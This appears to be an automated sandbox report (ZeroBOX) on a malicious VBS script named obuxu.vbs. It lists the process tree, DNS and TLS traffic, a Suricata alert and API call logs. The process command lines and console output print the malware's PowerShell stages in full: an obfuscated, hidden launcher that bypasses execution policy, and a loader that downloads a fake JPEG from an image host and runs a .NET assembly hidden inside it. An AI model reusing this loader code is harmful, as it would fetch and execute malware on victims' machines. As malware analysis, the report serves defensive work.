popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

obuxu.vbs

Generic Malware Antivirus PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Oct. 27, 2023, 10:10 a.m. Oct. 27, 2023, 10:12 a.m.
Size 240.8KB
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5 136abae59cb3eb697de1c5e20778ecd6
SHA256 72d46456c38f739d6ff5653cc5c55d4a301bb872fea4905b7fbaaf37978e5a1f
CRC32 5E951B27
ssdeep 3072:lPPPPPs6uAPPPPPHPPPPPtPPPPPNfPPPPP3PPPPP3PPPPP6PPPPPwPPPPPhzY:W6uszY
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\obuxu.vbs

    1688

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JBÇlkoçBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçVQByBÇlkoçGwBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBoBÇlkoçHQBÇlkoçdBÇlkoçBwBÇlkoçHMBÇlkoçOgBÇlkoçvBÇlkoçC8BÇlkoçdQBwBÇlkoçGwBÇlkoçbwBhBÇlkoçGQBÇlkoçZBÇlkoçBlBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBuBÇlkoçHMBÇlkoçLgBjBÇlkoçG8BÇlkoçbQBÇlkoçuBÇlkoçGIBÇlkoçcgBÇlkoçvBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBzBÇlkoçC8BÇlkoçMBÇlkoçBÇlkoçwBÇlkoçDQBÇlkoçLwBÇlkoç2BÇlkoçDQBÇlkoçNBÇlkoçBÇlkoçvBÇlkoçDcBÇlkoçNBÇlkoçBÇlkoç5BÇlkoçC8BÇlkoçbwByBÇlkoçGkBÇlkoçZwBpBÇlkoçG4BÇlkoçYQBsBÇlkoçC8BÇlkoçbgBlBÇlkoçHcBÇlkoçXwBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçLgBqBÇlkoçHBÇlkoçBÇlkoçZwBÇlkoç/BÇlkoçDEBÇlkoçNgBÇlkoç5BÇlkoçDgBÇlkoçMBÇlkoçBÇlkoç4BÇlkoçDQBÇlkoçNQBÇlkoçyBÇlkoçDMBÇlkoçJwBÇlkoç7BÇlkoçCQBÇlkoçdwBlBÇlkoçGIBÇlkoçQwBsBÇlkoçGkBÇlkoçZQBuBÇlkoçHQBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçTgBlBÇlkoçHcBÇlkoçLQBPBÇlkoçGIBÇlkoçagBlBÇlkoçGMBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçTgBlBÇlkoçHQBÇlkoçLgBXBÇlkoçGUBÇlkoçYgBDBÇlkoçGwBÇlkoçaQBlBÇlkoçG4BÇlkoçdBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBÇlkoçkBÇlkoçHcBÇlkoçZQBiBÇlkoçEMBÇlkoçbBÇlkoçBpBÇlkoçGUBÇlkoçbgB0BÇlkoçC4BÇlkoçRBÇlkoçBvBÇlkoçHcBÇlkoçbgBsBÇlkoçG8BÇlkoçYQBkBÇlkoçEQBÇlkoçYQB0BÇlkoçGEBÇlkoçKBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBVBÇlkoçHIBÇlkoçbBÇlkoçBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçVBÇlkoçBlBÇlkoçHgBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçVBÇlkoçBlBÇlkoçHgBÇlkoçdBÇlkoçBÇlkoçuBÇlkoçEUBÇlkoçbgBjBÇlkoçG8BÇlkoçZBÇlkoçBpBÇlkoçG4BÇlkoçZwBdBÇlkoçDoBÇlkoçOgBVBÇlkoçFQBÇlkoçRgBÇlkoç4BÇlkoçC4BÇlkoçRwBlBÇlkoçHQBÇlkoçUwB0BÇlkoçHIBÇlkoçaQBuBÇlkoçGcBÇlkoçKBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBCBÇlkoçHkBÇlkoçdBÇlkoçBlBÇlkoçHMBÇlkoçKQBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBÇlkoç8BÇlkoçDwBÇlkoçQgBBBÇlkoçFMBÇlkoçRQBÇlkoç2BÇlkoçDQBÇlkoçXwBTBÇlkoçFQBÇlkoçQQBSBÇlkoçFQBÇlkoçPgBÇlkoç+BÇlkoçCcBÇlkoçOwBÇlkoçkBÇlkoçGUBÇlkoçbgBkBÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBÇlkoç8BÇlkoçDwBÇlkoçQgBBBÇlkoçFMBÇlkoçRQBÇlkoç2BÇlkoçDQBÇlkoçXwBFBÇlkoçE4BÇlkoçRBÇlkoçBÇlkoç+BÇlkoçD4BÇlkoçJwBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBUBÇlkoçGUBÇlkoçeBÇlkoçB0BÇlkoçC4BÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçE8BÇlkoçZgBÇlkoçoBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçKQBÇlkoç7BÇlkoçCQBÇlkoçZQBuBÇlkoçGQBÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçFQBÇlkoçZQB4BÇlkoçHQBÇlkoçLgBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçTwBmBÇlkoçCgBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBGBÇlkoçGwBÇlkoçYQBnBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçHMBÇlkoçdBÇlkoçBhBÇlkoçHIBÇlkoçdBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGcBÇlkoçZQBÇlkoçgBÇlkoçDBÇlkoçBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGEBÇlkoçbgBkBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGcBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçgBÇlkoçCsBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçLgBMBÇlkoçGUBÇlkoçbgBnBÇlkoçHQBÇlkoçaBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçYgBhBÇlkoçHMBÇlkoçZQBÇlkoç2BÇlkoçDQBÇlkoçTBÇlkoçBlBÇlkoçG4BÇlkoçZwB0BÇlkoçGgBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBzBÇlkoçHQBÇlkoçYQByBÇlkoçHQBÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçDsBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBDBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçFQBÇlkoçZQB4BÇlkoçHQBÇlkoçLgBTBÇlkoçHUBÇlkoçYgBzBÇlkoçHQBÇlkoçcgBpBÇlkoçG4BÇlkoçZwBÇlkoçoBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBMBÇlkoçGUBÇlkoçbgBnBÇlkoçHQBÇlkoçaBÇlkoçBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçBjBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçQwBvBÇlkoçG4BÇlkoçdgBlBÇlkoçHIBÇlkoçdBÇlkoçBdBÇlkoçDoBÇlkoçOgBGBÇlkoçHIBÇlkoçbwBtBÇlkoçEIBÇlkoçYQBzBÇlkoçGUBÇlkoçNgBÇlkoç0BÇlkoçFMBÇlkoçdBÇlkoçByBÇlkoçGkBÇlkoçbgBnBÇlkoçCgBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBDBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçGwBÇlkoçbwBhBÇlkoçGQBÇlkoçZQBkBÇlkoçEEBÇlkoçcwBzBÇlkoçGUBÇlkoçbQBiBÇlkoçGwBÇlkoçeQBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçUgBlBÇlkoçGYBÇlkoçbBÇlkoçBlBÇlkoçGMBÇlkoçdBÇlkoçBpBÇlkoçG8BÇlkoçbgBÇlkoçuBÇlkoçEEBÇlkoçcwBzBÇlkoçGUBÇlkoçbQBiBÇlkoçGwBÇlkoçeQBdBÇlkoçDoBÇlkoçOgBMBÇlkoçG8BÇlkoçYQBkBÇlkoçCgBÇlkoçJBÇlkoçBjBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçB0BÇlkoçHkBÇlkoçcBÇlkoçBlBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçbBÇlkoçBvBÇlkoçGEBÇlkoçZBÇlkoçBlBÇlkoçGQBÇlkoçQQBzBÇlkoçHMBÇlkoçZQBtBÇlkoçGIBÇlkoçbBÇlkoçB5BÇlkoçC4BÇlkoçRwBlBÇlkoçHQBÇlkoçVBÇlkoçB5BÇlkoçHBÇlkoçBÇlkoçZQBÇlkoçoBÇlkoçCcBÇlkoçRgBpBÇlkoçGIBÇlkoçZQByBÇlkoçC4BÇlkoçSBÇlkoçBvBÇlkoçG0BÇlkoçZQBÇlkoçnBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçG0BÇlkoçZQB0BÇlkoçGgBÇlkoçbwBkBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçdBÇlkoçB5BÇlkoçHBÇlkoçBÇlkoçZQBÇlkoçuBÇlkoçEcBÇlkoçZQB0BÇlkoçE0BÇlkoçZQB0BÇlkoçGgBÇlkoçbwBkBÇlkoçCgBÇlkoçJwBWBÇlkoçEEBÇlkoçSQBÇlkoçnBÇlkoçCkBÇlkoçLgBJBÇlkoçG4BÇlkoçdgBvBÇlkoçGsBÇlkoçZQBÇlkoçoBÇlkoçCQBÇlkoçbgB1BÇlkoçGwBÇlkoçbBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçWwBvBÇlkoçGIBÇlkoçagBlBÇlkoçGMBÇlkoçdBÇlkoçBbBÇlkoçF0BÇlkoçXQBÇlkoçgBÇlkoçCgBÇlkoçJwBkBÇlkoçEgBÇlkoçaBÇlkoçBÇlkoçwBÇlkoçEwBÇlkoçbQBÇlkoçxBÇlkoçGkBÇlkoçYgB5BÇlkoçDgBÇlkoçeBÇlkoçBOBÇlkoçFMBÇlkoçNBÇlkoçB6BÇlkoçE0BÇlkoçeQBÇlkoç0BÇlkoçHkBÇlkoçTgBDBÇlkoçDQBÇlkoçegBPBÇlkoçFQBÇlkoçRQB2BÇlkoçEwBÇlkoçegBwBÇlkoçHcBÇlkoçZBÇlkoçBIBÇlkoçFIBÇlkoçbwBÇlkoçnBÇlkoçCBÇlkoçBÇlkoçLBÇlkoçBÇlkoçgBÇlkoçCcBÇlkoçZBÇlkoçBmBÇlkoçGQBÇlkoçZgBkBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGYBÇlkoçZBÇlkoçBmBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGYBÇlkoçZBÇlkoçBmBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGEBÇlkoçZBÇlkoçBzBÇlkoçGEBÇlkoçJwBÇlkoçgBÇlkoçCwBÇlkoçIBÇlkoçBÇlkoçnBÇlkoçGQBÇlkoçZQBÇlkoçnBÇlkoçCBÇlkoçBÇlkoçLBÇlkoçBÇlkoçgBÇlkoçCcBÇlkoçYwB1BÇlkoçCcBÇlkoçKQBÇlkoçpBÇlkoçBÇlkoç==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('BÇlkoç','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"

      2164

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/644/749/original/new_image.jpg?1698084523';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0Lm1iby8xNS4zMy4yNC4zOTEvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"

        2280

Name Response Post-Analysis Lookup
apps.identrust.com
A 23.32.56.72
A 23.32.56.80
CNAME a1952.dscq.akamai.net
CNAME identrust.edgesuite.net
23.67.53.27
uploaddeimagens.com.br
A 104.21.45.138
A 172.67.215.45
104.21.45.138
IP Address Status Action
164.124.101.2 Active Moloch
172.67.215.45 Active Moloch
23.32.56.80 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49166 -> 172.67.215.45:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49166
172.67.215.45:443 		C=US, O=Let's Encrypt, CN=E1 CN=uploaddeimagens.com.br d4:47:9f:16:cd:db:0a:99:1e:d8:a8:20:24:9b:c9:bb:4c:62:39:71

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connecti
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: on was closed: Could not establish trust relationship for the SSL/TLS secure ch
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: annel."
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: At line:1 char:181
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/644/749/original/new_i
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: mage.jpg?1698084523';$webClient = New-Object System.Net.WebClient;$imageBytes =
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: $webClient.DownloadData <<<< ($imageUrl);$imageText = [System.Text.Encoding]::
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE6
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: 4_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.In
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: dexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex +=
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $im
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: ageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]:
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: :FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: ]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method =
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0Lm1iby8xNS4zMy4yNC4zOTEvL
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: zpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: Exception calling "GetString" with "1" argument(s): "Array cannot be null.
console_handle: 0x0000010f
1 1 0

WriteConsoleW

 buffer: Parameter name: bytes"
console_handle: 0x0000011b
1 1 0

WriteConsoleW

 buffer: At line:1 char:244
console_handle: 0x00000127
1 1 0

WriteConsoleW

 buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/644/749/original/new_i
console_handle: 0x00000133
1 1 0

WriteConsoleW

 buffer: mage.jpg?1698084523';$webClient = New-Object System.Net.WebClient;$imageBytes =
console_handle: 0x0000013f
1 1 0

WriteConsoleW

 buffer: $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.G
console_handle: 0x0000014b
1 1 0

WriteConsoleW

 buffer: etString <<<< ($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE6
console_handle: 0x00000157
1 1 0

WriteConsoleW

 buffer: 4_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.In
console_handle: 0x00000163
1 1 0

WriteConsoleW

 buffer: dexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex +=
console_handle: 0x0000016f
1 1 0

WriteConsoleW

 buffer: $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $im
console_handle: 0x0000017b
1 1 0

WriteConsoleW

 buffer: ageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]:
console_handle: 0x00000187
1 1 0

WriteConsoleW

 buffer: :FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly
console_handle: 0x00000193
1 1 0

WriteConsoleW

 buffer: ]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method =
console_handle: 0x0000019f
1 1 0

WriteConsoleW

 buffer: $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0Lm1iby8xNS4zMy4yNC4zOTEvL
console_handle: 0x000001ab
1 1 0

WriteConsoleW

 buffer: zpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))
console_handle: 0x000001b7
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000001c3
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000001cf
1 1 0

WriteConsoleW

 buffer: You cannot call a method on a null-valued expression.
console_handle: 0x000001ef
1 1 0

WriteConsoleW

 buffer: At line:1 char:350
console_handle: 0x000001fb
1 1 0

WriteConsoleW

 buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/644/749/original/new_i
console_handle: 0x00000207
1 1 0

WriteConsoleW

 buffer: mage.jpg?1698084523';$webClient = New-Object System.Net.WebClient;$imageBytes =
console_handle: 0x00000213
1 1 0

WriteConsoleW

 buffer: $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.G
console_handle: 0x0000021f
1 1 0

WriteConsoleW

 buffer: etString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>
console_handle: 0x0000022b
1 1 0

WriteConsoleW

 buffer: >';$startIndex = $imageText.IndexOf <<<< ($startFlag);$endIndex = $imageText.In
console_handle: 0x00000237
1 1 0

WriteConsoleW

 buffer: dexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex +=
console_handle: 0x00000243
1 1 0

WriteConsoleW

 buffer: $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $im
console_handle: 0x0000024f
1 1 0

WriteConsoleW

 buffer: ageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]:
console_handle: 0x0000025b
1 1 0

WriteConsoleW

 buffer: :FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly
console_handle: 0x00000267
1 1 0

WriteConsoleW

 buffer: ]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method =
console_handle: 0x00000273
1 1 0

WriteConsoleW

 buffer: $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0Lm1iby8xNS4zMy4yNC4zOTEvL
console_handle: 0x0000027f
1 1 0

WriteConsoleW

 buffer: zpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))
console_handle: 0x0000028b
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : InvalidOperation: (IndexOf:String) [], RuntimeEx
console_handle: 0x00000297
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00400228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00400368
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00400368
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00400368
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003ffb68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003ffb68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003ffb68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003ffb68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003ffb68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003ffb68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00400368
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00400368
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00400368
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004008e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004008e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004008e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004005e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004008e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004008e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004008e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004008e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004008e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004008e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004008e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004006a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004006a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004006a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004006a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
